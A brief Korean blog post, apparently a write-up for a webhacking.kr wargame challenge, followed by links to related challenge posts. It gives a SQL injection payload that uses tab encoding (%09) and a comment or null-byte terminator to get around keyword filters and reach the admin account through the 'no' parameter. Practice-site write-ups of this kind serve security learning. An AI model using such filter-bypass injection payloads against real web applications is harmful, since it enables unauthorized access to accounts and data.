728x90
필터링 문자들을 피해서 admin에 접근.
주소창에 no의 값으로 100)%09or%09no%09like%092--%09 를 전달한다.
-- 대신 ;%00는 해도된다.
%09(Tab)대신 %0a(\n), /**/(주석)는 왜 안되는진 모르겠다.
728x90
'webhacking.kr' 카테고리의 다른 글
webhacking 29(SQL Injection) (0) | 2022.12.19 |
---|---|
webhacking 28(설정 파일 업로드) (0) | 2022.12.19 |
webhacking 26(URL Encoding) (0) | 2022.12.18 |
webhacking 25(LFI) (0) | 2022.12.17 |
webhacking 24(PHP) (0) | 2022.12.17 |